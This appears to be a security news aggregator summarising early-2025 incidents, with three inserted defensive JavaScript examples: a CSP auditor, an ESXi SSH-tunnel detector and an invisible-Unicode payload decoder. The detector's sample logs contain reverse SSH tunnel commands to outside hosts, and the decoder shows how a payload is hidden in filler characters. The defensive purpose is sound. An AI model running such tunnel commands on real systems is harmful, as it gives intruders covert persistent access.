Recommended read:
References :
  • Cyber Security News: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • securityaffairs.com: Multiple Git flaws led to credentials compromise
  • The Hacker News: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • cyberpress.org: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • ciso2ciso.com: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
  • ciso2ciso.com: Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials. “Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,” GMO Flatt Security […]
  • ciso2ciso.com: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs – Source:thehackernews.com
  • discuss.privacyguides.net: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • Dataconomy: Clone2Leak exposes credential risks in Git ecosystem
  • BleepingComputer: A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests.
  • www.bleepingcomputer.com: News about Clone2Leak vulnerabilities in the Git ecosystem.

@securityonline.info - 18d
Progress Software has released patches to address multiple high-severity vulnerabilities in its LoadMaster software. These flaws could allow remote, authenticated attackers to execute arbitrary system commands on affected systems. The vulnerabilities stem from improper input validation, where attackers who gain access to the management interface can inject malicious commands via crafted HTTP requests.

The affected software includes LoadMaster versions from 7.2.48.12 and prior, 7.2.49.0 to 7.2.54.12 (inclusive), and 7.2.55.0 to 7.2.60.1 (inclusive), as well as Multi-Tenant LoadMaster version 7.1.35.12 and prior. Progress Software has implemented input sanitization to mitigate these vulnerabilities, preventing arbitrary system commands from being executed. Users are advised to update to the latest patched versions to ensure the security of their systems.

Recommended read:
References :
  • community.progress.com: Progress security advisory "05" February 2024: four entries, each rated (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows: OS Command Injection. Remote malicious actors who gain access to the management interface of LoadMaster and successfully authenticate could issue a carefully crafted HTTP request that allows arbitrary system commands to be executed. This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands being executed. We have not received any reports that these vulnerabilities have been exploited and we are not aware of any direct impact on customers.
  • securityaffairs.com: Progress Software fixed multiple high-severity LoadMaster flaws - SecurityAffairs
  • securityonline.info: Progress LoadMaster Security Update: Multiple Vulnerabilities Addressed - SecurityOnline
  • The Hacker News: Progress Software Patches High-Severity LoadMaster Flaws Affecting Multiple Versions - The Hacker News
  • securityonline.info: Security Online Article about Progress LoadMaster Security Update

@www.bleepingcomputer.com - 9d
Chinese APT groups are actively targeting U.S. telecom providers and European healthcare organizations using sophisticated cyberattacks. The attacks involve custom malware, such as JumbledPath used by Salt Typhoon to spy on U.S. telecom networks, and the exploitation of vulnerabilities like the Check Point flaw (CVE-2024-24919). These campaigns are characterized by the deployment of advanced tools like ShadowPad and NailaoLocker ransomware, indicating a blend of espionage and financially motivated cybercrime.

These threat actors gain initial access through exploited vulnerabilities, then move laterally within the networks using techniques like RDP to obtain elevated privileges. The attackers then deploy ShadowPad and PlugX, before deploying the NailaoLocker ransomware in the final stages, encrypting files and demanding Bitcoin payments. These findings highlight the evolving tactics of Chinese APT groups and the challenges in attributing these attacks, given the blurring lines between state-sponsored espionage and financially driven operations.

Recommended read:
References :

@www.bleepingcomputer.com - 20d
The North Korean hacking group Kimsuky has been observed using a custom-built RDP Wrapper and proxy tools in recent cyber espionage campaigns. According to reports from the AhnLab Security Intelligence Center (ASEC), these tools enable the group to directly access infected machines and maintain persistent access, representing a shift in tactics from relying solely on noisy backdoors like PebbleDash. The group also utilizes the forceCopy stealer malware.

Kimsuky's attack strategy typically begins with spear-phishing emails containing malicious shortcut (.LNK) files disguised as legitimate documents. When opened, these files execute PowerShell or Mshta scripts to download malware, including the custom RDP Wrapper. This wrapper is designed to bypass security measures by modifying export functions, making it difficult for security tools to detect. The group also uses keyloggers to capture user keystrokes and proxy malware to bypass network restrictions, facilitating remote access to compromised systems even within private networks.

Recommended read:
References :

Pierluigi Paganini@Security Affairs - 26d
A web skimming campaign has targeted multiple websites, including Casio UK, in a sophisticated double-entry attack. Security firm Jscrambler discovered that at least 17 websites were compromised, with the attack on Casio UK lasting from January 14th to January 24th. The threat actor installed a web skimmer on all pages except the checkout page. This skimmer altered the usual payment flow, manipulating the user into entering sensitive information such as name, address, email, phone number, and credit card details into a fake payment form.

The double-entry technique involved an unobfuscated loader that fetched a second-stage skimmer from an attacker-controlled server. This skimmer encrypted and exfiltrated sensitive customer information, including contact information, credit card details, and billing addresses, concealing malicious activity through XOR-based string masking and custom encoding. After completing the fake form, victims were redirected to the legitimate checkout page, where they were asked to fill out the same details again. Jscrambler noted that Casio UK's website had a content security policy set to report-only, which logged events but failed to prevent the attack.
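The report-only detail is the practitioner's takeaway: a Content-Security-Policy-Report-Only header logs violations but blocks nothing, so an externally loaded skimmer still runs. The following is an added example, not Jscrambler's or Casio UK's code, that audits a response's headers to distinguish an enforced policy from a report-only one and flags script-src values that would not have stopped an external loader. Header names follow the standard; the sample policies are constructed and say nothing about the policy Casio UK actually deployed.

```javascript
// Added example: audit Content-Security-Policy headers. Sample values are constructed.

// Parse a CSP header value into a map of directive -> list of source expressions.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Effective script sources: script-src, falling back to default-src.
function scriptSources(directives) {
  return directives["script-src"] || directives["default-src"] || null;
}

// headers: plain object of response header name -> value (lookup is case-insensitive).
function auditCsp(headers) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key ? headers[key] : null;
  };
  const enforced = get("content-security-policy");
  const reportOnly = get("content-security-policy-report-only");
  const findings = [];

  if (!enforced && !reportOnly) findings.push("no CSP header at all");
  if (!enforced && reportOnly) {
    findings.push("CSP is report-only: violations are logged, not blocked");
  }

  // Audit whichever policy is present; an enforced one takes precedence.
  const policy = enforced ? parseCsp(enforced) : reportOnly ? parseCsp(reportOnly) : null;
  const scripts = policy ? scriptSources(policy) : null;
  if (policy && !scripts) findings.push("no script-src or default-src: any script origin is allowed");
  if (scripts && scripts.includes("*")) findings.push("script-src allows any host (*)");
  if (scripts && scripts.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
  if (scripts && scripts.some((s) => /^https?:$/.test(s))) {
    findings.push("script-src allows any https:/http: origin");
  }

  return { enforced: Boolean(enforced), reportOnly: Boolean(reportOnly), scriptSources: scripts, findings };
}

// Stand-alone demonstration with constructed headers.
if (typeof require !== "undefined" && require.main === module) {
  console.log(auditCsp({ "Content-Security-Policy-Report-Only": "default-src 'self'; script-src 'self' https:" }));
  console.log(auditCsp({ "Content-Security-Policy": "default-src 'self'; script-src 'self' https://cdn.example" }));
}
```

Running this against a storefront's checkout and non-checkout pages is a quick way to confirm that the policy is actually enforced on every page, since the Casio UK skimmer was placed on all pages except checkout.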

Recommended read:
References :
  • securityaffairs.com: Web Skimmer found on at least 17 websites, including Casio UK
  • www.scworld.com: Web skimming campaign hits several websites
  • ciso2ciso.com: Casio Website Infected With Skimmer  – Source: www.securityweek.com
  • ciso2ciso.com: CISO to CISO reports on the web skimming attack against Casio and 16 other websites.
  • : Casio and 16 Other Websites Hit by Double-Entry Web Skimming Attack – Source:hackread.com
  • ciso2ciso.com: The attackers' goal was to harvest and exfiltrate visitor information.
  • Secure Bulletin: On February 3, 2025, the Casio UK online store fell victim to a significant cyberattack, leading to the unauthorized access and theft of customer credit card information.
  • BleepingComputer: Casio UK's e-shop at casio.co.uk was hacked to include malicious scripts that stole credit card and customer information between January 14 and 24, 2025.
  • www.bleepingcomputer.com: Bleeping Computer article on the Casio UK online store being hacked to steal customer credit cards.
  • securebulletin.com: Malicious scripts on the CASIO e-shop stole credit card and personal customer details

SC Staff@scmagazine.com - 33d
Ransomware gangs are increasingly using SSH tunneling to maintain stealthy access when targeting VMware ESXi hypervisors. This technique allows attackers to remain undetected while they move laterally within the system and deploy ransomware. Cyber security firm Sygnia's investigation has revealed that after infiltrating ESXi instances by exploiting known vulnerabilities or using stolen administrator credentials, the attackers utilize the built-in SSH service to establish covert pathways for ransomware delivery. The use of SSH tunnels, often configured with remote port-forwarding to the attacker's command-and-control server, creates a semi-persistent backdoor due to the resilience and infrequent shutdowns of ESXi appliances.

This persistent access poses a serious threat to virtualized environments, as ransomware can cripple an entire business by encrypting vital virtual machines. Researchers recommend that administrators monitor specific log files, including those tracking ESXi Shell command execution, user authentication, and login attempts, to identify potential SSH-based intrusions. They also point to the hostd.log and vobd.log files as key sources for detecting persistent SSH access. Such monitoring is critical to detecting and mitigating these attacks.
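The ESXi Shell command log is the most direct place to see the remote port-forwarding described above, because the `ssh -R` invocation itself is recorded. The following is an added example, not Sygnia's tooling: a small parser for shell-command log lines plus a detector that flags `ssh` invocations carrying a forwarding flag. The line layout approximates `/var/log/shell.log` on ESXi (`<timestamp> <severity> shell[<pid>]: [<user>]: <command>`) and the sample lines are constructed; check the format against a real host before relying on the regex.

```javascript
// Added example (not Sygnia's code): flag SSH tunnelling commands in ESXi shell logs.
// Log lines below are constructed; the format approximates /var/log/shell.log.

const SAMPLE_SHELL_LOG = [
  "2025-01-20T03:12:44Z In(14) shell[2101337]: [root]: esxcli network ip interface list",
  "2025-01-20T03:13:02Z In(14) shell[2101337]: [root]: ssh -fN -R 8443:127.0.0.1:22 svc@203.0.113.10",
  "2025-01-20T03:14:15Z In(14) shell[2101337]: [root]: ls /vmfs/volumes",
  "2025-01-20T03:15:40Z In(14) shell[2101337]: [root]: ssh -o StrictHostKeyChecking=no -N -R 2222:localhost:22 198.51.100.7",
  "2025-01-20T03:16:01Z In(14) shell[2101337]: [root]: ssh admin@10.0.0.5",
  "a line that does not match the expected layout",
];

// <timestamp> [<severity>(<n>)] shell[<pid>]: [<user>]: <command>
const LINE_RE = /^(\S+)(?: \S+\(\d+\))? shell\[(\d+)\]: \[([^\]]+)\]: (.*)$/;

function parseShellLogLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { timestamp: m[1], pid: Number(m[2]), user: m[3], command: m[4] };
}

// Return the forwarding flags (-R remote, -L local, -D dynamic) found in an
// ssh command line. Flags may be clustered ("-fNR") or fused with their
// argument ("-R8443:..."), so each single-dash token is scanned letter by letter
// until a non-letter is hit. A plain interactive "ssh host" yields [].
function sshForwardingFlags(command) {
  const argv = command.trim().split(/\s+/);
  if (argv.length === 0 || argv[0].split("/").pop() !== "ssh") return [];
  const found = new Set();
  for (const arg of argv.slice(1)) {
    if (!arg.startsWith("-") || arg.startsWith("--")) continue;
    for (const ch of arg.slice(1)) {
      if (!/[A-Za-z]/.test(ch)) break;
      if ("RLD".includes(ch)) found.add(ch);
    }
  }
  return [...found];
}

// Scan a batch of log lines and return the entries that set up an SSH tunnel.
function detectSshTunnels(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseShellLogLine(line);
    if (!entry) continue;
    const flags = sshForwardingFlags(entry.command);
    if (flags.length > 0) hits.push({ ...entry, flags });
  }
  return hits;
}

// Stand-alone demonstration over the constructed sample.
if (typeof require !== "undefined" && require.main === module) {
  for (const hit of detectSshTunnels(SAMPLE_SHELL_LOG)) {
    console.log(`${hit.timestamp} user=${hit.user} flags=${hit.flags.join(",")} cmd=${hit.command}`);
  }
}
```

Pair this with the authentication and login-attempt logs named above: a forwarding command from a session whose login is not accounted for is the combination worth escalating.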

Recommended read:
References :
  • BleepingComputer: Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected.
  • securityaffairs.com: Threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection.
  • www.scworld.com: Covert VMware ESXI-targeted ransomware hack facilitated by SSH tunneling
  • www.bleepingcomputer.com: Ransomware gang uses SSH tunnels for stealthy VMware ESXi access
  • ciso2ciso.com: ESXi ransomware attacks use SSH tunnels to avoid detection – Source: securityaffairs.com
  • www.sygnia.co: Sygnia’s Zhongyuan Hau (Aaron) & Ren Jie Yow show how ransomware threat actors use SSH tunneling between their C2 servers and the compromised environment for persistence.
  • Virus Bulletin: Sygnia’s Zhongyuan Hau (Aaron) & Ren Jie Yow show how ransomware threat actors use SSH tunneling between their C2 servers and the compromised environment for persistence.
  • ciso2ciso.com: Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations – Source:thehackernews.com

Pierluigi Paganini@Security Affairs - 14d
Valve has removed the game PirateFi from the Steam video game platform after discovering it contained malware. The free-to-play game, available on Steam, was found to be distributing the Vidar infostealing malware to unsuspecting users. Valve has also warned affected users to reformat their operating systems to ensure complete removal of any potential threats.

According to SteamDB, PirateFi was downloaded by an estimated 800 to 1,500 users before its delisting. The developer's Steam account uploaded builds to Steam that contained suspected malware. Following the game’s removal, Valve sent notifications to users who played PirateFi and recommended a complete system scan using anti-virus software.

Recommended read:
References :
  • CyberInsider: Valve Removes Steam Game "PirateFi" After Malware Discovery
  • Dataconomy: This Steam game is full of malware: Did you download it?
  • BleepingComputer: A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users.
  • securityaffairs.com: Valve removed the game PirateFi from the Steam video game platform because it contained malware

@www.bleepingcomputer.com - 8d
Critical security vulnerabilities have been patched in Juniper Networks Session Smart Routers and several Atlassian products. A critical authentication bypass vulnerability, identified as CVE-2025-21589, affects Juniper's Session Smart Router, Conductor, and WAN Assurance Managed Routers. Juniper Networks has released a patch to address this flaw, which could allow attackers to bypass authentication and gain control of affected Session Smart Router devices.

Australian software firm Atlassian has also released security patches to address 12 critical and high-severity vulnerabilities across its product suite, including Bamboo, Bitbucket, Confluence, Crowd, and Jira. Among the most severe vulnerabilities fixed is CVE-2024-50379, which has a CVSS score of 9.8 and could lead to remote code execution. Users of these products are strongly advised to apply the available patches as soon as possible to mitigate potential risks.

Recommended read:
References :
  • Anonymous: Juniper Networks has patched a critical vulnerability that allows attackers to bypass authentication and take over Session Smart Router (SSR) devices.
  • securityaffairs.com: Australian software firm Atlassian patched 12 critical and high-severity flaws in Bamboo, Bitbucket, Confluence, Crowd, and Jira. Software firm Atlassian released security patches to address 12 critical- and high-severity vulnerabilities in Bamboo, Bitbucket, Confluence, Crowd, and Jira products. The most severe vulnerabilities addressed by the company are: CVE-2024-50379 – (CVSS score of 9.8) – RCE

@securityonline.info - 23d
Cybersecurity experts are warning of a widespread campaign involving Nova Stealer, a variant of SnakeLogger malware, now being sold as Malware-as-a-Service (MaaS) on underground forums. Priced as low as $50 for a 30-day license, Nova Stealer is designed to steal sensitive information, including credentials, keystrokes, screenshots, and clipboard data, making it an attractive tool for cybercriminals. This affordability and ease of deployment significantly lower the barrier for entry, enabling even novice attackers to launch sophisticated cyberattacks, especially targeting industries such as finance, retail, and IT.

The malware is often distributed through phishing emails disguised as legitimate documents. Once executed, Nova Stealer employs sophisticated techniques to evade detection, including steganography and process hollowing, while exploiting Windows utilities like PowerShell to disable Microsoft Defender. Stolen data is exfiltrated via channels such as SMTP, FTP, or Telegram APIs, and can be leveraged for identity theft, financial fraud, and ransomware attacks. The rise of Nova Stealer highlights the persistent threat posed by information stealers in the cybercrime ecosystem.

Recommended read:
References :
  • gbhackers.com: Beware of Nova Stealer Malware Sold for $50 on Hacking Forums
  • securityonline.info: $50 for Your Data: NOVA Stealer Sold as Malware-as-a-Service
  • securityonline.info: The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial
  • gbhackers.com: The cybersecurity landscape faces a new challenge with the emergence of Nova Stealer, a malware marketed under the Malware-as-a-Service (MaaS) model.
  • cyberpress.org: Cybercriminals Selling Nova Stealer Malware for $50 on Dark Web

@www.bleepingcomputer.com - 9d
A new JavaScript obfuscation technique has been discovered and is being actively used in phishing attacks. Juniper Threat Labs identified the technique targeting affiliates of a major American political action committee (PAC) in early January 2025. The method leverages invisible Unicode characters to represent binary values, effectively concealing malicious JavaScript code within seemingly harmless text.

This obfuscation technique was first demonstrated in October 2024, highlighting how quickly such research can be weaponized in real-world attacks. The encoding uses two invisible Unicode filler characters, the half-width Hangul Filler and the full-width Hangul Filler, to represent the binary values 0 and 1. This lets attackers hide an entire payload invisibly within a script; the payload is then recovered and executed through a Proxy get() trap. Security researchers have published methods to decode the encoded JavaScript into readable form.
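For an analyst, the useful tool is the reverse direction: find the runs of filler characters in a suspicious script and turn them back into text. The following is an added example, not Juniper's or the original researchers' code. It locates runs of the two filler code points (U+3164 Hangul Filler and U+FFA0 Halfwidth Hangul Filler) and decodes them as one bit per character, eight bits per character code. Which filler stands for 0 and which for 1, and the 8-bit grouping, are assumptions; the mapping is a parameter so the other assignment can be tried. The sample blob is constructed from the harmless string "hello".

```javascript
// Added example (not Juniper's code): detect and decode invisible-Unicode payloads.
// Bit assignment and 8-bit grouping are assumptions; pass a different map to change them.

const HANGUL_FILLER = "\u3164";           // full-width Hangul Filler
const HALFWIDTH_HANGUL_FILLER = "\uFFA0"; // half-width Hangul Filler
const DEFAULT_MAP = { zero: HALFWIDTH_HANGUL_FILLER, one: HANGUL_FILLER };

function isFiller(ch) {
  return ch === HANGUL_FILLER || ch === HALFWIDTH_HANGUL_FILLER;
}

// Report every run of filler characters long enough to carry a payload.
// Positions are code-point indices into the text.
function findInvisibleRuns(text, minLength = 16) {
  const chars = [...text];
  const runs = [];
  let start = -1;
  for (let i = 0; i <= chars.length; i++) {
    const filler = i < chars.length && isFiller(chars[i]);
    if (filler && start < 0) start = i;
    if (!filler && start >= 0) {
      if (i - start >= minLength) runs.push({ start, length: i - start });
      start = -1;
    }
  }
  return runs;
}

// Decode one run: each filler is a bit, eight bits make one character code.
// Characters outside the map are skipped; a trailing partial byte is dropped.
function decodeInvisible(run, map = DEFAULT_MAP) {
  let out = "";
  let bits = 0;
  let count = 0;
  for (const ch of run) {
    if (ch === map.zero) bits = bits << 1;
    else if (ch === map.one) bits = (bits << 1) | 1;
    else continue;
    count++;
    if (count === 8) {
      out += String.fromCharCode(bits);
      bits = 0;
      count = 0;
    }
  }
  return out;
}

// Decode every run found in a blob of script text, e.g. the property-name string
// a Proxy get() trap would receive.
function extractInvisiblePayloads(text, map = DEFAULT_MAP) {
  const chars = [...text];
  return findInvisibleRuns(text).map((r) =>
    decodeInvisible(chars.slice(r.start, r.start + r.length).join(""), map)
  );
}

// Constructed helper, used only to build sample input for the demonstration.
// Assumes 8-bit character codes (ASCII input).
function encodeForTest(text, map = DEFAULT_MAP) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0) & 0xff;
    for (let b = 7; b >= 0; b--) out += (code >> b) & 1 ? map.one : map.zero;
  }
  return out;
}

// Stand-alone demonstration: the blob looks like an empty-ish string literal.
if (typeof require !== "undefined" && require.main === module) {
  const blob = "const k = '" + encodeForTest("hello") + "';";
  console.log(findInvisibleRuns(blob));        // one run of 40 fillers at index 11
  console.log(extractInvisiblePayloads(blob)); // [ 'hello' ]
}
```

A script whose string literals contain long runs of these code points is worth a look on its own, before decoding: neither filler has any reason to appear in ordinary JavaScript, so `findInvisibleRuns` doubles as a cheap triage rule.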

Recommended read:
References :
  • blogs.juniper.net: Invisible obfuscation technique used in PAC attack
  • bsky.app: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
  • BleepingComputer: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
  • Anonymous: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
  • www.bleepingcomputer.com: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
  • Christoffer S.: Juniper Networks: Invisible obfuscation technique used in PAC attack Novel obfuscation technique observed in a phishing attack targeting affiliates of a political action committee (PAC) in January 2025.

@ciso2ciso.com - 30d
A new TorNet backdoor has been discovered being spread through an ongoing phishing campaign. This malicious campaign is targeting primarily users in Poland and Germany, utilizing phishing emails written in Polish and German. These emails impersonate financial institutions and manufacturing companies, containing malicious attachments in .tgz format. When opened, a .NET loader executes, downloading the PureCrypter malware, which is then used to deploy multiple payloads. These payloads include Agent Tesla, Snake Keylogger, and the new TorNet backdoor itself.

The TorNet backdoor is particularly concerning because it connects to its command and control server over the TOR network for stealthy communication, making detection more difficult. The malware, which continues to be distributed through the ongoing campaign, abuses Windows Scheduled Tasks to achieve persistence, with the task configured to run even on systems with low battery. These sophisticated techniques emphasize the need for heightened security awareness training and advanced threat detection tools.

Recommended read:
References :
  • ciso2ciso.com: TorNet Backdoor Detection: An Ongoing Phishing Email Campaign Uses PureCrypter Malware to Drop Other Payloads
  • blog.talosintelligence.com: New TorNet Backdoor Campaign
  • The Hacker News: PureCrypter Deploys Agent Tesla and New TorNet Backdoor in Ongoing Cyberattacks

@www.helpnetsecurity.com - 23d
Two malicious Python packages, named "deepseeek" and "deepseekai", were recently discovered on the Python Package Index (PyPI). These packages were designed to mimic client libraries for the DeepSeek AI API. However, researchers found that they contained malicious code intended to collect user and computer data, as well as environment variables that could expose sensitive information like API keys and database credentials. The packages were quickly reported to and quarantined by PyPI administrators, but were downloaded 36 times in their brief availability.

These malicious packages used Pipedream, an integration platform, as a command-and-control server to receive stolen data. The incident highlights the increasing trend of attackers exploiting the popularity of AI tools like DeepSeek and the growing use of AI in creating malicious payloads. Researchers advise developers to exercise caution when using newly released packages, especially those posing as wrappers for popular services, and to verify the authenticity of software packages before installation.

Recommended read:
References :
  • www.helpnetsecurity.com: Help Net Security article on DeepSeek's popularity being exploited to push malicious packages via PyPI.
  • Help Net Security: DeepSeek’s popularity exploited to push malicious packages via PyPI

@securityboulevard.com - 29d
Ransomware attacks reached a record high in December 2024, with 574 incidents reported, according to an NCC Group report. A newly identified group called FunkSec, which combines hacktivism and cybercrime, was responsible for over 100 of these attacks, making them the most active group for the month. This represents a significant surge in cybercrime with the industrial sector being targeted most often. It is believed that poor security measures, a lack of awareness and the use of evolving technologies such as Generative AI are partially responsible for this growth in attacks, along with the use of infostealer malware for gaining initial access to networks.

Other organizations have also fallen victim to ransomware attacks. The New York Blood Center Enterprises (NYBC), one of the largest non-profit blood donation organizations, had its IT systems crippled by a ransomware attack. This has caused major disruptions and risks to supplies that are sent to over 400 hospitals. Additionally, British engineering firm Smiths Group is working to restore its systems after suffering a cyberattack that caused unauthorized access, and Indian tech giant Tata Technologies had to temporarily suspend some of its IT services after being targeted by ransomware.

Recommended read:
References :